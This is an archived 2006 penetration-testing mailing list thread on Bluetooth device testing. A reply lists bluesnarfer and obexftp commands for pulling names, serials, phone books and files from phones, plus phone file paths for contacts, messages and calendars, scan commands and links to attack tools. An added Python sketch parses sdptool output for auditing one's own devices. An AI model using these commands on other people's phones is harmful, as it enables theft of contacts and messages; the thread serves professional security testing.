Penetration Testing mailing list archives
SV: Bluetooth Pentesting?
From: "Martin Gustafsson" <gustafsson.martin () bredband net>
Date: Tue, 22 Aug 2006 22:27:41 +0200
Hi,

The car stereo trick can be done using carwhisperer (see Trifinite's page).

I have not been monitoring bluetooth security for the last year, but here are some commands you can run. Do not expect to find any major holes on a new phone though...

COMMANDS:

hcitool info $BD_ADDR
hcitool name $BD_ADDR
sdptool browse $BD_ADDR
sdptool browse --tree $BD_ADDR

Snarf name and serial
bluesnarfer -i -b $BD_ADDR

Snarf phone books
bluesnarfer -l -b $BD_ADDR

Try to FTP files
obexftp -b $BD_ADDR -B $channel -g $file

The FTP channel is labeled "OBEX Object Push" when you run "sdptool browse"

Files I have found to be valid on different phones
telecom/cal.vcs
telecom/cal/###.vcs
telecom/cal/info.log
telecom/devinfo.txt
telecom/folderlisting
telecom/inmsg.vmg
telecom/note.vnt
telecom/outmsg.vmg
telecom/pb.vcf
telecom/pb/###.vcf
telecom/pb/0.vcf
telecom/pb/1.vcf
telecom/pb/info.log
telecom/push.txt
telecom/rtc.txt
telecom/sentmsg.vm
telecom/something.jph

Scan RFCOMM channels
rfcomm_scan $BD_ADDR

Scan 30 000 PSM ports (takes LONG time)
psm_scan $BD_ADDR

SOME LINKS:

Bluesweep:
http://www.airmagnet.com/products/bluesweep.htm

BLUETOOTH SECURITY TOOLS
http://student.vub.ac.be/~sijansse/2e%20lic/BT/Tools/Tools.html

Bluescanner
http://www.networkchemistry.com/products/bluescanner.php

Bluetooth projects
http://www.alighieri.org/project.html

Bluesniping
http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/

Bluetooth device security database
http://www.betaversion.net/btdsd/

BTscanner
http://www.pentest.co.uk/cgi-bin/viewcat.cgi?cat=downloads

Bluetooth advisories and "Greenplaque"
http://www.digitalmunition.com/

Backtrack (Bootable pentest dist) got a bunch of bluetooth tools.
http://www.remote-exploit.org/index.php/BackTrack

Bluetooth tools
http://www.securitywireless.info/Downloads-index-req-viewdownload-cid-18.html

Bluetest.pl
http://www.syss.de/links.html

Trifinite tools
http://trifinite.org/trifinite_downloads.html

Regards,
Martin Gustafsson
CISSP

-----Original Message-----
From: Robert D. Holtz [mailto:robert.d.holtz () gmail com]
Sent: 22 August 2006 02:49
To: steven () lovebug org; pen-test () securityfocus com
Subject: RE: Bluetooth Pentesting?

Here's an interesting article on Bluetooth security:

http://ntrg.cs.tcd.ie/undergrad/4ba2.05/group15/index.html

There was also a story circulating a while back about the ability to transmit radio directly into someone's car stereo with a directional antenna.

I'm sorry that I can't recall the details but I found it amusing that you can mess with someone by having whatever you want coming out their radio ... not truly a "real" security issue but amusing nonetheless.

-----Original Message-----
From: steven () lovebug org [mailto:steven () lovebug org]
Sent: Monday, August 21, 2006 3:06 PM
To: pen-test () securityfocus com
Subject: Bluetooth Pentesting?

Greetings,

Does anyone on this list do bluetooth pentesting? I have read tons of old posts and found plenty of tools to do a few different things. However, I do not find any of it to be overly useful. Most of the tools out there seem to be aimed at certain cell phones or are very specific. I am trying to find out what the risks are of all kinds of devices.

I have found btscanner to be pretty good at detecting devices but it doesn't do too much other than detect it. I can scan and pick up 150+ devices and the Vulnerable to: section is always the same.. blank. Are all the bluetooth devices I find so super secure? I pick up cars, phones, PDAs, computers, keyboards, etc. Are there really no risks with these devices?

Is there a better/good tool out there that can really find various bluetooth devices and tell me what -real- risks might be associated with them -- on top of that.. is there a good tool for trying to pull data or use these devices? Example: a dell or mac laptop has bluetooth on, or a Treo with it on.. what are the possible risks? What tools can actually test if authentication is required for connecting with these devices.. or whether I can bruteforce it or connect at all?

Any suggestions would be greatly appreciated and I am really trying to do something more than just "detect" bluetooth devices. I need to know if there are risks here.

Thanks

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php
------------------------------------------------------------------------
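
Added example, not part of the original messages: the thread asks how to tell what a device really exposes, and the "sdptool browse" step in the reply is what lists it. This Python sketch parses that output into records and reports services outside an approved set when auditing your own devices; parse_sdp_browse, unapproved_services and the sample text are constructed for illustration.

```python
import re
# Constructed sample laid out like `sdptool browse` output; not from a real device.
SAMPLE = '''Browsing 00:11:22:33:44:55 ...
Service Name: OBEX Object Push
Service RecHandle: 0x10003
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)

Service RecHandle: 0x10004
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 10
  "OBEX" (0x0008)

Service Name: Headset Audio Gateway
Service RecHandle: 0x10005
Service Class ID List:
  "Headset Audio Gateway" (0x1112)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 3
'''

def parse_sdp_browse(text):
    """One dict per SDP record: name (may be absent), 16-bit class UUIDs, RFCOMM channel."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):  # records are blank-line separated
        name = re.search(r"^Service Name:\s*(.+)$", block, re.M)
        ids = re.search(r"Service Class ID List:\n((?:[ \t]+.*\n?)+)", block)
        chan = re.search(r'"RFCOMM".*\n\s+Channel:\s*(\d+)', block)
        uuids = re.findall(r"\(0x([0-9a-fA-F]{4})\)", ids.group(1)) if ids else []
        records.append({"name": name.group(1).strip() if name else None,
                        "uuids": [int(u, 16) for u in uuids],
                        "rfcomm": int(chan.group(1)) if chan else None})
    return records

def unapproved_services(records, approved_uuids):
    """Records with no class UUID in the approved set (assumed audit policy)."""
    return [r for r in records if not set(r["uuids"]) & set(approved_uuids)]
```

Matching on the service class UUID rather than the display name keeps the check working for records that carry no "Service Name" line, as the second constructed record shows.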